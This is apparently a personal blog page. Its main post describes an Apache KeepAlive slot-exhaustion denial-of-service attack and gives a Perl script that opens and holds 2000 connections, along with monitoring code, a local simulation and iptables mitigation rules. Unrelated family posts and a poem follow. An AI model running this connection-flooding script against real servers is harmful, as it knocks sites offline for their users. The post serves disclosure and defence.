The Apache Keep-Alive Tarpit Exploit

I have found a denial of service (DoS) problem with the KeepAlive setting in Apache version 2. It may exist in other versions as well.

What I've found is that with KeepAlive off, Apache continues to serve content under the test load below, while with KeepAlive on a simple script can use up every connection slot on the server and block other users.

Here is the test I used.

1) turn on mod_status and the server-status handler
2) check the setting – KeepAlive On
3) set KeepAliveTimeout to 45
4) restart Apache
5) run the script below and watch the connections on the server-status page
6) browse the server under attack; it should continue to work
7) un-comment the Keep-Alive line in the script and perform the test again; this time the scoreboard fills with 'K' and a browser request waits until a slot times out

The server-status page has a scoreboard block that shows the current state of each possible connection slot.

 

____K__._.__K___K__K_K___CK_WK__K_K_.C__K___K__KK__K__K_K__K_K__
_______KK__K___K_K_K__KK___KK___K____K______K_____K_______K__K_K
_KKKK__...______C_K____.__.._KK__K_K_K______K__K_K_________K_K_
__K____.KKK_KKK__K__K_K____C_____.___KK___K_W____K__KKK___K_K___
_KK________K____K__K_____.___K___._KK___K___KK__K________K_K_KK_

Scoreboard Key:
"_" Waiting for Connection, "S" Starting up, "R" Reading Request,
"W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup,
"C" Closing connection, "L" Logging, "G" Gracefully finishing,
"I" Idle cleanup of worker, "." Open slot with no current process

I found that with KeepAlive off, the busy slots in this block show up as 'W' and the server continues to serve content: each worker sends its reply to the HTTP/1.0 request, closes the connection, and is immediately free for the next request. With KeepAlive on, each connection opened stays dedicated to the user that opened it until KeepAliveTimeout expires or the client closes it, so the slots fill up with 'K' and stay that way.
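Step 5 says to watch the connections. As an added example that is not part of the original post, here is a small Python monitor that reads the Scoreboard: line mod_status prints for /server-status?auto, counts the slot states, and flags the picture this post describes: most of the live slots parked in 'K'. The sample status text and the 80% threshold are constructed for the example.

```python
"""Watch the server-status scoreboard for keep-alive slot exhaustion.

Added example, not the post's own code: parse the "Scoreboard:" line that
mod_status emits for /server-status?auto, count the slot states, and flag
the case where most live slots are held in 'K'. The sample status text
and the 80% threshold are assumptions.
"""
from collections import Counter

# Meaning of each scoreboard character, as printed by mod_status.
STATE_NAMES = {
    "_": "waiting", "S": "starting", "R": "reading", "W": "writing",
    "K": "keepalive", "D": "dns", "C": "closing", "L": "logging",
    "G": "graceful", "I": "idle-cleanup", ".": "open-slot",
}

# Constructed sample of the ?auto output: 32 slots, 28 of them in keep-alive.
SAMPLE_STATUS = """Total Accesses: 12345
BusyWorkers: 29
IdleWorkers: 3
Scoreboard: KKKKKKKK_KKKKKKKWKKKKKK_KKKKKK_K
"""


def parse_scoreboard(status_text):
    """Return a Counter of state characters from a ?auto status page."""
    for line in status_text.splitlines():
        if line.startswith("Scoreboard:"):
            return Counter(line.split(":", 1)[1].strip())
    raise ValueError("no Scoreboard: line found")


def keepalive_pressure(counts, threshold=0.8):
    """Fraction of live slots in 'K', and whether it crosses the threshold.

    Live slots are every state except "." (no process in the slot), so the
    ratio measures how much of the running server is tied up waiting for
    clients that may never send another request.
    """
    live = sum(n for state, n in counts.items() if state != ".")
    if live == 0:
        return 0.0, False
    fraction = counts.get("K", 0) / live
    return fraction, fraction >= threshold


if __name__ == "__main__":
    counts = parse_scoreboard(SAMPLE_STATUS)
    frac, alarm = keepalive_pressure(counts)
    print({STATE_NAMES[s]: n for s, n in sorted(counts.items())})
    print(f"keep-alive share of live slots: {frac:.0%}  alarm={alarm}")
```

Fed the real ?auto page (fetched with curl, for instance) on a cron schedule, the same two functions give an early warning that slots are being held rather than served, which a plain BusyWorkers count does not distinguish.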

So KeepAlive can be used for a very effective denial of service attack, especially if KeepAliveTimeout is set high. The default KeepAliveTimeout is five (5) seconds; I have worked on systems where it was set as high as 45 seconds. With the prefork MPM each held connection ties up a whole child process, and the number of slots is fixed by MaxClients, so an attacker only needs that many idle sockets to fill the server.

My proof of concept script tries to open 2000 TCP connections to YOUR.IP.GOES.HERE, sends one request on each, and then sleeps for sixty seconds. It sends HTTP/1.0 requests, so without the Connection header Apache replies and closes each connection at once; with the Keep-Alive line un-commented, Apache holds each connection open for KeepAliveTimeout seconds after the reply. The shell you run it from needs an open-file limit above 2000 (ulimit -n), or the die will fire long before the slots are full.

Here is the script I used.

 

#!/usr/bin/perl
# Proof of concept: open 2000 TCP connections to a web server, send one
# request on each, then hold the sockets open for sixty seconds.
use strict;
use warnings;
use IO::Socket::INET;

my $count = 2000;
my @sock;                       # keeps every handle alive until the script exits
for my $i (1 .. $count) {
    $sock[$i] = IO::Socket::INET->new(
        PeerAddr => 'YOUR.IP.GOES.HERE',
        PeerPort => '80',
        Proto    => 'tcp',
    ) or die "Could not create socket $i: $!\n";
    my $sck = $sock[$i];
    print $sck "GET / HTTP/1.0\r\n";
    # Un-comment the next line to ask Apache to hold the connection open
    # for KeepAliveTimeout seconds after it replies.
#    print $sck "Connection: Keep-Alive\r\n";
    print $sck "\r\n";          # blank line ends the request
}
sleep 60;                       # keep all the connections open
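The experiment in steps 1 to 7 can be reproduced on one machine without touching a real Apache. The following Python model is an added example, not the post's script: a server with a fixed pool of worker threads stands in for the prefork MPM, with KeepAlive and KeepAliveTimeout as parameters (the slot count of 4, the 3-second timeout, the 0.5-second probe and the request text are assumptions). fill_slots plays the role of the script above with the Keep-Alive line un-commented, and probe plays the browser from step 6. With KeepAlive On the four held connections leave the fifth visitor waiting in the listen backlog; with KeepAlive Off the same four connections are replied to and closed, and the visitor is served.

```python
"""Local model of the keep-alive slot exhaustion described above.

Added example, not the post's own script: a tiny HTTP/1.0 server with a fixed
pool of worker threads stands in for the prefork MPM (one worker owns one
connection at a time, like one Apache child). Slot count, timeouts and
request text are assumptions chosen for the demonstration.
"""
import socket
import threading

def read_head(sock):
    """Read an HTTP head up to the blank line; b"" means the peer closed."""
    buf = b""
    while b"\r\n\r\n" not in buf:
        chunk = sock.recv(4096)
        if not chunk:
            return b""
        buf += chunk
    return buf

class PreforkModel:
    def __init__(self, slots, keepalive, keepalive_timeout):
        self.keepalive = keepalive                  # the KeepAlive directive
        self.keepalive_timeout = keepalive_timeout  # KeepAliveTimeout, seconds
        self.stop = threading.Event()
        self.listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.listener.bind(("127.0.0.1", 0))
        self.listener.listen(16)
        self.listener.settimeout(0.1)               # lets workers notice stop
        self.port = self.listener.getsockname()[1]
        self.workers = [threading.Thread(target=self._worker, daemon=True)
                        for _ in range(slots)]
        for t in self.workers:
            t.start()

    def _worker(self):
        """One worker handles one connection at a time, like a prefork child."""
        while not self.stop.is_set():
            try:
                conn, _ = self.listener.accept()
            except socket.timeout:
                continue
            with conn:
                self._serve(conn)

    def _serve(self, conn):
        conn.settimeout(self.keepalive_timeout)
        while True:
            try:
                request = read_head(conn)
            except socket.timeout:
                return          # KeepAliveTimeout expired: slot freed
            if not request:
                return          # client closed: slot freed
            hold = self.keepalive and b"connection: keep-alive" in request.lower()
            conn.sendall(b"HTTP/1.0 200 OK\r\nContent-Length: 0\r\nConnection: "
                         + (b"Keep-Alive" if hold else b"close") + b"\r\n\r\n")
            if not hold:
                return          # KeepAlive Off: reply, close, slot freed
            # KeepAlive On: sit in 'K' until the client talks or the timeout fires

    def shutdown(self):
        self.stop.set()
        for t in self.workers:
            t.join(timeout=1)
        self.listener.close()

def fill_slots(port, count):
    """Open `count` keep-alive connections and hold them open: the 'K' slots."""
    held = []
    for _ in range(count):
        s = socket.create_connection(("127.0.0.1", port), timeout=2)
        s.sendall(b"GET / HTTP/1.0\r\nConnection: Keep-Alive\r\n\r\n")
        read_head(s)            # once the reply is in, the worker is idle in K
        held.append(s)
    return held

def probe(port, timeout):
    """True if a plain request from a new visitor is answered within `timeout`."""
    s = socket.create_connection(("127.0.0.1", port), timeout=timeout)
    try:
        s.sendall(b"GET / HTTP/1.0\r\n\r\n")
        return read_head(s).startswith(b"HTTP/1.0 200")
    except socket.timeout:
        return False            # the kernel queued the connection; no worker is free
    finally:
        s.close()

def run_experiment(keepalive, slots=4):
    """Fill every slot from one host, then ask whether a new visitor is served."""
    server = PreforkModel(slots, keepalive, keepalive_timeout=3.0)
    held = []
    try:
        held = fill_slots(server.port, slots)
        return probe(server.port, timeout=0.5)
    finally:
        server.stop.set()       # workers stop accepting before the slots are released
        for s in held:
            s.close()
        server.shutdown()
```

run_experiment(keepalive=True) returns False and run_experiment(keepalive=False) returns True; the only difference between the two runs is the server-side directive, exactly as in the test above. Raising keepalive_timeout changes nothing except how long the probe would have to wait for a slot, which is the point about a 45-second KeepAliveTimeout.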

If you are using SSL, turning off Keep-Alive may be very painful. Without Keep-Alive, SSL sessions get negotiated much more often, since every request then costs a new TCP connection and a new handshake (session resumption softens this but does not remove it).

One way to limit this attack is to use a firewall and limit the number of new TCP sessions that can be opened from a single IP. That only blunts a single attacking host: many source addresses, or one NAT gateway shared by many real users, are not told apart by a per-address rule. On the Apache side, a short KeepAliveTimeout limits how long a held slot stays held, and the event MPM in Apache 2.4 parks idle keep-alive connections on a listener thread instead of a worker, which removes most of this exposure.

With Linux iptables the rules look like this. The first rule records the source address of every new connection to port 80; the second drops a new connection from an address that has already opened 8 or more in the last 4 seconds (-m conntrack --ctstate NEW is the current spelling of -m state --state NEW):

iptables -A INPUT -i eth0 -p tcp --dport 80 -m state --state NEW -m recent --set
iptables -A INPUT -i eth0 -p tcp --dport 80 -m state --state NEW -m recent --update --seconds 4 --hitcount 8 -j DROP

I hope someone can show where I've gone wrong here.

Welcome European Union

If you reached here through www.grennan.eu WELCOME!

I have registered my name in the European Union for my friends.

If your last name is Grennan and you would like email at grennan.eu, just email me at mark@grennan.com and I'll give you your own email address. I can either create a forward for you, or I can give you a mailbox at www.grennan.com/webmail.

People used to say the Internet would isolate people. I don't believe it. I'm much closer to my family and friends. I have also made many friends all around the world. I hope someday to find my distant relatives.

P.S. I’d like to thank Javan (Nathan’s Friend) again for helping register the domain.

Nathan moves to Silicon Valley

Saturday, April 1st (2006), is Apple's 30th anniversary. Happy birthday, Apple.

So this is also my 30th year in the computer business. Thirty years ago I was working for KA Electronics in Dallas, Texas, as a stock boy and going to DeVry to learn electronics. I remember reading Popular Electronics and wishing I had the money to order an Apple 1. Later it was my work with the Apple II that launched my career in computers.

Billeo

Now, thirty years later, on this date, Nathan (my son) has moved to Cupertino, CA, the Hollywood of the computer industry, to start a new job at Billeo as their lead Internet tech.

Friday was Nathan's last day at ???, where he did lots of Internet systems work and customer support. Friday night Nathan and I moved Okcforum.org from his apartment to a system he rents on the Internet.

Saturday he packed up all his stuff in a U-Haul, closed all his accounts and services in Reno, NV, and drove over the mountains to Silicon Valley. Most of the time he makes this drive it is snowing on the passes. On this trip it only rained. As a matter of fact, he had rain for the packing, driving and unpacking. Saturday night he stayed in a hotel.

Sunday he went apartment shopping. He says the hunting process was hard. Most apartments would not let him move in that day because they required the "corporate offices" to do a credit search, and that couldn't happen until Monday. Late Sunday he found Oak Pointe apartments and they had no problems. They could do all the approvals over the Internet. (Imagine that!)

He is now moved into a two bedroom, two bath apartment. (pictures coming)

Now it's Monday morning. This is his first day at the new job, a full generation after the personal computer industry began.

UPDATE: 04/04/06 – Monday was not Nathan's first day at work. Today is. His boss helped him move in on Sunday but the work didn't get completely done, so he was given Monday off to complete the move-in process.

He did get a cell phone on Monday and returned the U-Haul. Today at 3:00 his Internet and cable should be connected. We are still waiting for pictures.

 


Iva’s Poems – Page 4

This poem was written by Iva for Father's Day.

 

Ever Lasting Love

On Father's Day, I send no card,
I lift my face toward my Lord.
Then I talk to Him, and Daddy too,
God called him home and left me blue.
Tho time has passed since he went away,
I miss him more and more each day.

His guiding hand was so much help,
I follow his footprints step-by-step.
When I grow up I want to be,
all that Dad has been to me.
His pleasant smile still gives me joy,
tho he is separated from his job.

by Iva Ridgway